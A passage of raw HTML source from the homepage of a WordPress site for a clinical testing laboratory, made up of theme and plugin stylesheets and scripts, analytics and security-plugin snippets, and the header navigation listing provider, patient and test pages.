f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='layerslider-css' href='https://www.diagnostechs.com/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css?ver=6.8.2' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-preloader-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-preloader.css?ver=5.1.1' type='text/css' media='all' /> <style id='thegem-preloader-inline-css' type='text/css'> body:not(.compose-mode) .gem-icon .gem-icon-half-1, body:not(.compose-mode) .gem-icon .gem-icon-half-2 { opacity: 0 !important; } </style> <link rel='stylesheet' id='thegem-reset-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-reset.css?ver=5.1.1' type='text/css' media='all' /> <style id='thegem-reset-inline-css' type='text/css'> .fullwidth-block { -webkit-transform: translate3d(0, 0, 0); -moz-transform: translate3d(0, 0, 0); -ms-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); } </style> <link rel='stylesheet' id='thegem-grid-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-grid.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-style-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-child-style-css' href='https://www.diagnostechs.com/wp-content/themes/thegem-child/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-header-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-header.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-widgets-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-widgets.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-new-css-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-new-css.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='perevazka-css-css-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-perevazka-css.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-google-fonts-css' href='//fonts.googleapis.com/css?family=Montserrat%3A700%2Cregular%7CSource+Sans+Pro%3Aregular%2C300&#038;subset=latin%2Clatin-ext%2Cvietnamese%2Cgreek-ext%2Ccyrillic-ext%2Ccyrillic%2Cgreek&#038;ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-custom-css' href='https://www.diagnostechs.com/wp-content/themes/thegem-child/css/custom.css?ver=5.1.1' type='text/css' media='all' /> <style id='thegem-custom-inline-css' type='text/css'> .vc_custom_1529033806889{background-color: #ffffff !important;} .footer-menu-section h4 { text-transform: uppercase; font-weight: 400; color: white; margin-top: 0px; } </style> <link rel='stylesheet' id='js_composer_front-css' href='https://www.diagnostechs.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.7' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-additional-blog-1-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-additional-blog-1.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-hovers-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-hovers.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-lazy-loading-animations-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-lazy-loading-animations.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-fancybox-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/js/fancyBox/jquery.fancybox.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thegem-vc_elements-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-vc_elements.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://www.diagnostechs.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.diagnostechs.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://www.diagnostechs.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.2' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='parent-style-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='child-style-css' href='https://www.diagnostechs.com/wp-content/themes/thegem-child/style.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='thegem_js_composer_front-css' href='https://www.diagnostechs.com/wp-content/themes/thegem/css/thegem-js_composer_columns.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='timed-content-css-css' href='https://www.diagnostechs.com/wp-content/plugins/timed-content/css/timed-content.css?ver=2.56' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var gemSettings = {"isTouch":"","forcedLasyDisabled":"","tabletPortrait":"","tabletLandscape":"","topAreaMobileDisable":"","parallaxDisabled":"","fillTopArea":"","themePath":"https:\/\/www.diagnostechs.com\/wp-content\/themes\/thegem","rootUrl":"https:\/\/www.diagnostechs.com","mobileEffectsEnabled":"","isRTL":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-settings-init.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var LS_Meta = {"v":"6.8.2"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedia.jquery.js?ver=6.8.2'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transitions.js?ver=6.8.2'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/thegem-fullwidth-loader.js?ver=5.1.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/themes/thegem/js/html5.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/www.diagnostechs.com","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.6.0'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.2'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.2'></script> <script type='text/javascript' src='https://www.diagnostechs.com/wp-content/plugins/timed-content/js/timed-content.js?ver=2.56'></script> <meta name="generator" content="Powered by LayerSlider 6.8.2 - Multi-Purpose, Responsive, Parallax, Mobile-Friendly Slider Plugin for WordPress." /> <!-- LayerSlider updates and docs at: https://layerslider.kreaturamedia.com --> <link rel='https://api.w.org/' href='https://www.diagnostechs.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.diagnostechs.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.diagnostechs.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://www.diagnostechs.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.diagnostechs.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.diagnostechs.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.diagnostechs.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.diagnostechs.com%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.diagnostechs.com/?wordfence_lh=1&hid=0A6B16CE52246277BDAAF5067ADA20D5'); </script><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://www.diagnostechs.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.4.8.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <link rel="icon" href="https://www.diagnostechs.com/wp-content/uploads/2016/10/DTI_Logo_DTI_Blue_Screen_IconWhtBck_1000px.png" sizes="32x32" /> <link rel="icon" href="https://www.diagnostechs.com/wp-content/uploads/2016/10/DTI_Logo_DTI_Blue_Screen_IconWhtBck_1000px.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.diagnostechs.com/wp-content/uploads/2016/10/DTI_Logo_DTI_Blue_Screen_IconWhtBck_1000px.png" /> <meta name="msapplication-TileImage" content="https://www.diagnostechs.com/wp-content/uploads/2016/10/DTI_Logo_DTI_Blue_Screen_IconWhtBck_1000px.png" /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <style type="text/css" data-type="vc_custom-css">.wpb_map_wraper:after { display: block; content: ''; position: absolute; background-color: #c4dae7; opacity: 0.4; width: 100%; height: 100%; top: 0; } .gem-team-style-4 .team-person { border-bottom: 6px solid #00a4ef; } .gem-team-style-4 .team-person-phone { color: #00a4ef; } .gem-map-with-text { margin-bottom: 0; } .gem-counter-text { float: left; width: 55%; font-size: 14px; text-transform: uppercase; border-left: 1px solid #385561; margin-top: 17px; } .gem-counter-number { float: left; width: 45%; font-size: 36px; } .gem-counter { padding: 0; } .custom-image .gem-counter-inner { padding: 0; } .custom-image .gem-image-centered-box { margin-bottom: -10px; } .custom-qf .quickfinder-item-title { font-size: 19px; } .custom-qf .quickfinder-item-title:after { content: ''; display: block; width: 43px; height: 1px; background-color: rgb(76, 88, 103); margin: 0 auto; margin-top: 10px; color: ; } .custom-qf .quickfinder-item:hover .quickfinder-item-title:after { background-color: #fff; } .custom-qf .quickfinder-item-box { border: 1px solid #dfe5e8; } .custom-qf-2 .quickfinder-item:first-child { border-right: 1px solid #e0e8ed; border-bottom: 1px solid #e0e8ed; } .custom-qf-2 .quickfinder-item:last-child { border-left: 1px solid #e0e8ed; border-top: 1px solid #e0e8ed; margin-left: -1px; } .custom-qf-2 .quickfinder-item-title { font-size: 19px; } .custom-qf-2 .quickfinder-item { margin-bottom: -1px; } .custom-qf-2 .quickfinder { padding: 0; } .custom-qf-2 .quickfinder-item { padding-top: 20px; padding-bottom: 8px; } #testimonials-color *{ color: #fff; } body .custom-qf-3 .quickfinder-style-vertical .quickfinder-item.odd .quickfinder-item-info{ background-color: #042938; } body .custom-qf-3 .quickfinder-style-vertical .quickfinder-item.odd .qf-svg-arrow-right { fill: #042938; } body .custom-qf-3 .quickfinder-style-vertical .quickfinder-item.even .quickfinder-item-info{ background-color: #ffffff; } body .custom-qf-3 .quickfinder-style-vertical .quickfinder-item.even .qf-svg-arrow-left { fill: #ffffff; } .custom-qf-3 .quickfinder-item-image-wrapper.quickfinder-item-picture.quickfinder-item-image-shape-circle { box-shadow: 0 0 0 3px #0a3f59, 0 0 0 6px rgba(71,108,125,0.7) !important; } .quickfinder-item-effect-image-scale.hover .quickfinder-item-picture img { transform: none !important; } .quickfinder-item .quickfinder-item-picture { transition: none !important; } .quickfinder-item-effect-image-scale .quickfinder-item-picture.quickfinder-item-image-shape-circle img { border-radius: 100%; } .quickfinder-item-effect-image-scale.hover .quickfinder-item-picture:after { display: none; } .gem-table-style-1 tr:nth-child(even) td { background-color: #fff; } .gem-table-style-1 td { border-right: medium none; border-left: medium none; border-top: medium none; padding: 5px 0px; } .gem-table-style-1 tr:last-child td { border: none; } .contact-form-style-medical-2 input { background-color: transparent; border: none; border-bottom: 1px solid #fff; } .contact-form-style-medical-2 .wpcf7-form-control-wrap { width: 100%; } .contact-form-style-medical-2 input[type="date"] { width: 100%; } .contact-form-style-medical-2 input[type='date']::-webkit-inner-spin-button { -webkit-appearance: none; display: none; color:transparent; background:transparent; position:absolute; font-size:0; } .contact-form-style-medical-2 input[type='date']::-webkit-outer-spin-button { -webkit-appearance: none; display: none; color:transparent; background:transparent; position:absolute; font-size:0; } .contact-form-style-medical-2 input[type='date']::-webkit-calendar-picker-indicator { color:transparent; background:transparent; position:absolute; width:100%; height:50px; font-size:0; cursor:pointer; } .contact-form-style-medical-2 input[type='date']::-webkit-clear-button { display: none; -webkit-appearance: none; } .contact-form-style-medical-2 input[type='date']:before { content: 'e635'; position: absolute; font-family: 'thegem-icons'; font-size: 24px; width: 24px; height: 24px; line-height: 24px; font-weight: normal; right: 14px; color: #91a1ac; } .wpcf7-form .contact-form-style-medical-2 input { background-color: transparent; border-bottom: 1px solid #fff !important; border: none; color: #fff !important; } .contact-form-style-medical-2 .wpcf7-form-control-wrap span.combobox-wrapper { background-color: transparent; border: none; border-bottom: 1px solid #fff; color: #fff !important; border-radius: 0px; } .contact-form-style-medical-2 .combobox-wrapper .combobox-text { color: #fff !important; padding-left: 0px; } .contact-form-style-medical-2 :before { color: #fff !important; } .wpcf7-form .contact-form-style-medical-2 input { padding-left: 0; } .wpcf7-form .contact-form-style-medical-2 input[type="submit"] { border: 1px solid; width: 225px; font-size: 14px; display: block; text-align: center; padding: 0; height: 40px; border-radius: 0px; margin: 0 auto; margin-top: 17px !important; } .contact-form-style-medical-2 p:last-child { width: 100%; display: block; float: left; margin-top: 25px; } .contact-form-style-medical-2 .email:after, .contact-form-style-medical-2 .name:after { display: none; } .wpcf7-form .contact-form-style-medical-2 input:focus { outline: none; } .wpcf7-form .combobox-wrapper { height: 37px; } .wpcf7-form .combobox-wrapper .combobox-text { line-height: 19px; } .wpcf7-form input[type="date"], .wpcf7-form input.wpcf7-text { padding-top: 4px; padding-bottom: 4px; } .wpcf7 p { margin-bottom: 29px; } .wpcf7-form .gem-button, .wpcf7-form input[type='submit'] { font-family: 'Montserrat UltraLight'; } ::-webkit-input-placeholder {color:#fff;} ::-moz-placeholder {color:#fff;}/* Firefox 19+ */ :-moz-placeholder {color:#fff;}/* Firefox 18- */ :-ms-input-placeholder {color:#fff;} .pricing-table-style-6 .pricing-footer, .pricing-table-style-6 .gem-button-position-center, .pricing-table-style-6 .pricing-row:nth-child(even) { background-color: #fff; } .pricing-table-style-6 .pricing-price { background-color: #393d50 !important; } .blog.blog-style-masonry article .description { background-color: #fff; } .gem-testimonials.style1 .gem-testimonial-wrapper:after { display:none; } .gem-prev:after, .gem-next:after { background-color: #54c2f4; color: #fff; } .gem-prev:hover:after, .gem-next:hover:after { background-color: #393d50; color: #fff; } @media (max-width: 1199px) { .wpb_row > * { margin-top: 0; } } .gem-map-with-text-content { padding: 0; } .d2-slidebanner2 { display: flex; flex-direction: row; padding: 12px 0; } .d2-slidebanner2 div { margin-left: 18px; } .d2-slidebanner2 h2 { margin: 0; font-family: Montserrat, sans-serif; color: white; text-transform: uppercase; font-size: 38pt; line-height: 40pt; } .d2-slidebanner2 p { margin-bottom: 0; color:white; font-family: Montserrat, sans-serif; font-size:20pt; line-height: 32pt; } @media screen and (max-width: 600px) { .d2-slidebanner2 { flex-direction: column; } .d2-slidebanner2 h2 { font-size: 9vw; line-height: 10vw; } .d2-slidebanner2 p { font-size: 18px; line-height: 20px; } } .gem-textbox { margin-bottom: 0; } .d2-layout { background-size: 900px; background-repeat: no-repeat; background-position: calc(50vw - 914px) 20px; } .tme-intro { font-family: Montserrat, "Source Sans Pro", sans-serif; text-transform: uppercase; color: #1a8fcb; font-weight: bold; font-size: 40px; line-height: 56px; margin: 8px 0; } a.learnmore-button { display: block; margin: 0 auto; width: 320px; background-color: #178388; text-align: center; text-transform: uppercase; font-size: 20px; line-height: 48px; color: white; font-family: Montserrat, "Source Sans Pro", sans-serif; font-weight: bold; } @media screen and (max-width: 1199px) { .d2-layout { background-size: 900px; background-repeat: no-repeat; background-position: calc(50vw - 600px) 20px; } .d2-layout p.tme-intro, .d2-layout p.tme-intro + p {padding: 0 16px;} } @media screen and (max-width: 700px) { .d2-layout { background-size: 150vw; background-position: -50vw 20px; } } @media screen and (max-width: 600px) { .d2-layout { background-position: -50vw 100px; } } @media screen and (max-width: 500px) { .d2-layout { background-position: -50vw 160px; } } </style><style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556136346473{background-color: #178388 !important;}.vc_custom_1556645378807{margin-bottom: 0px !important;padding-bottom: 0px !important;background-image: url(https://www.diagnostechs.com/wp-content/uploads/2019/04/hexgrid-home.jpg?id=30371) !important;}.vc_custom_1477486216071{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1478097542723{margin-bottom: 0px !important;padding-top: 40px !important;padding-bottom: 40px !important;background-color: #042938 !important;}.vc_custom_1529030911686{margin-bottom: 0px !important;padding-bottom: 0px !important;background-color: #f7f7f7 !important;}.vc_custom_1529032315416{margin-bottom: 0px !important;padding-bottom: 0px !important;background-color: #f7f7f7 !important;}.vc_custom_1529033357930{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1530665233960{margin-bottom: 0px !important;padding-top: 2px !important;padding-bottom: 0px !important;}.vc_custom_1556136918867{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1556675119344{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;background-color: #178388 !important;}.vc_custom_1478783677232{padding-right: 0px !important;padding-left: 0px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> </head> <body class="home page-template-default page page-id-30341 wpb-js-composer js-comp-ver-5.7 vc_responsive"> <div id="page" class="layout-fullwidth header-style-3"> <a href="#page" class="scroll-top-button"></a> <div id="site-header-wrapper" class=" sticky-header-on-mobile" > <header id="site-header" class="site-header animated-header mobile-menu-layout-default" role="banner"> <div id="top-area" class="top-area top-area-style-default top-area-alignment-justified"> <div class="container"> <div class="top-area-items inline-inside"> <div class="top-area-block top-area-contacts"><div class="gem-contacts inline-inside"><div class="gem-contacts-item gem-contacts-address">19110 66th Ave S, Bldg G, Kent, WA 98032</div><div class="gem-contacts-item gem-contacts-phone">+1 800-878-3787</div></div></div> <div class="top-area-block top-area-socials socials-colored-hover"> <div class="socials inline-inside"> <a class="socials-item" href="https://www.facebook.com/diagnostechs" target="_blank" title="facebook"><i class="socials-item-icon facebook "></i></a> <a class="socials-item" href="https://www.linkedin.com/company/diagnos-techs-inc" target="_blank" title="linkedin"><i class="socials-item-icon linkedin "></i></a> <a class="socials-item" href="https://www.twitter.com/diagnostechs" target="_blank" title="twitter"><i class="socials-item-icon twitter "></i></a> </div> </div> <div class="top-area-block top-area-menu"> <nav id="top-area-menu"> <ul id="top-area-navigation" class="nav-menu styled inline-inside"><li id="menu-item-29734" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29734"><a href="https://www.diagnostechs.com/providers-2/become-a-provider/">Become a Provider</a></li> <li id="menu-item-29735" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29735"><a href="https://www.diagnostechs.com/patients/locate-a-provider/">Locate a Provider</a></li> <li id="menu-item-29850" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29850"><a href="https://www.diagnostechs.com/contact-us/">Contact Us</a></li> </ul> </nav> <div class="top-area-button"><div class="gem-button-container gem-button-position-inline"><a class="gem-button gem-button-size-tiny gem-button-style-flat gem-button-text-weight-normal gem-button-no-uppercase" style="border-radius: 3px;" onmouseleave="" onmouseenter="" href="https://www.diagnostechs.com/providers/DTIClient/Welcome.aspx" target="_self">Provider Login</a></div> </div> </div> </div> </div> </div> <div class="container"> <div class="header-main logo-position-left header-layout-default header-style-3"> <div class="site-title"> <div class="site-logo" style="width:200px;"> <a href="https://www.diagnostechs.com/" rel="home"> <span class="logo"><img src="https://www.diagnostechs.com/wp-content/uploads/thegem-logos/logo_c8eaf5efdc052546aaac7c852d5438e1_1x.png" srcset="https://www.diagnostechs.com/wp-content/uploads/thegem-logos/logo_c8eaf5efdc052546aaac7c852d5438e1_1x.png 1x,https://www.diagnostechs.com/wp-content/uploads/thegem-logos/logo_c8eaf5efdc052546aaac7c852d5438e1_2x.png 2x,https://www.diagnostechs.com/wp-content/uploads/thegem-logos/logo_c8eaf5efdc052546aaac7c852d5438e1_3x.png 3x" alt="DiagnosTechs, Inc." style="width:200px;" class="default"/><img src="https://www.diagnostechs.com/wp-content/uploads/thegem-logos/logo_c8eaf5efdc052546aaac7c852d5438e1_1x.png" srcset="https://www.diagnostechs.com/wp-content/uploads/thegem-logos/logo_c8eaf5efdc052546aaac7c852d5438e1_1x.png 1x,https://www.diagnostechs.com/wp-content/uploads/thegem-logos/logo_c8eaf5efdc052546aaac7c852d5438e1_2x.png 2x,https://www.diagnostechs.com/wp-content/uploads/thegem-logos/logo_c8eaf5efdc052546aaac7c852d5438e1_3x.png 3x" alt="DiagnosTechs, Inc." style="width:150px;" class="small"/></span> </a> </div> </div> <nav id="primary-navigation" class="site-navigation primary-navigation" role="navigation"> <button class="menu-toggle dl-trigger">Primary Menu<span class="menu-line-1"></span><span class="menu-line-2"></span><span class="menu-line-3"></span></button> <ul id="primary-menu" class="nav-menu styled no-responsive dl-menu"><li id="menu-item-29447" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-parent menu-item-29447 megamenu-first-element"><a href="https://www.diagnostechs.com/providers-2/become-a-provider/">Providers</a><span class="menu-item-parent-toggle"></span> <ul class="sub-menu styled dl-submenu"> <li id="menu-item-28981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-28981 megamenu-first-element"><a href="https://www.diagnostechs.com/providers-2/become-a-provider/">Become a Provider</a></li> <li id="menu-item-29330" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29330 megamenu-first-element"><a href="https://www.diagnostechs.com/providers/DTIClient/Welcome.aspx">Account Login</a></li> <li id="menu-item-29008" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29008 megamenu-first-element"><a href="https://www.diagnostechs.com/providers-2/provider-faq/">Provider FAQ</a></li> </ul> </li> <li id="menu-item-29655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-parent menu-item-29655 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/our-patient-experience/">Patients</a><span class="menu-item-parent-toggle"></span> <ul class="sub-menu styled dl-submenu"> <li id="menu-item-29331" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29331 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/our-patient-experience/">Our Patient Experience</a></li> <li id="menu-item-29010" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29010 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/locate-a-provider/">Locate a Provider</a></li> <li id="menu-item-29018" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29018 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/test-instructions/">Test Instructions</a></li> <li id="menu-item-29421" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29421 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/download-forms/">Download Forms</a></li> <li id="menu-item-29017" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29017 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/return-a-kit/">Return a Kit</a></li> <li id="menu-item-29651" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-parent menu-item-29651 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/pay-a-bill/">Billing</a><span class="menu-item-parent-toggle"></span> <ul class="sub-menu styled dl-submenu"> <li id="menu-item-29015" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29015 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/pay-a-bill/">Pay a Bill</a></li> <li id="menu-item-29011" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29011 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/insurance-medicare/">Insurance / Medicare</a></li> <li id="menu-item-30191" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30191 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/insurance-medicare/insurance-cpt-codes/">Insurance CPT Codes</a></li> </ul> </li> <li id="menu-item-29013" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29013 megamenu-first-element"><a href="https://www.diagnostechs.com/patients/patient-faq/">Patient FAQ</a></li> </ul> </li> <li id="menu-item-29652" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-parent menu-item-29652 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/our-clinical-approach/">Our Tests</a><span class="menu-item-parent-toggle"></span> <ul class="sub-menu styled dl-submenu"> <li id="menu-item-29043" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29043 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/our-clinical-approach/">Our Clinical Approach</a></li> <li id="menu-item-30390" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30390 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/toxic-metals-and-elements-panels/">Toxic Metals and Elements (TME)</a></li> <li id="menu-item-29044" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29044 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/adrenal-stress-index-asi/">Adrenal Stress Index (ASI)</a></li> <li id="menu-item-29046" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29046 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/female-hormones/">Female Hormones</a></li> <li id="menu-item-29049" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29049 megamenu-first-element"><a href="https://www.diagnostechs.com/our-tests/male-hormones/">Male Hormones</a></li> <li id="menu-item-29048" class="menu-item menu-item-type-post_type menu-item-object-page 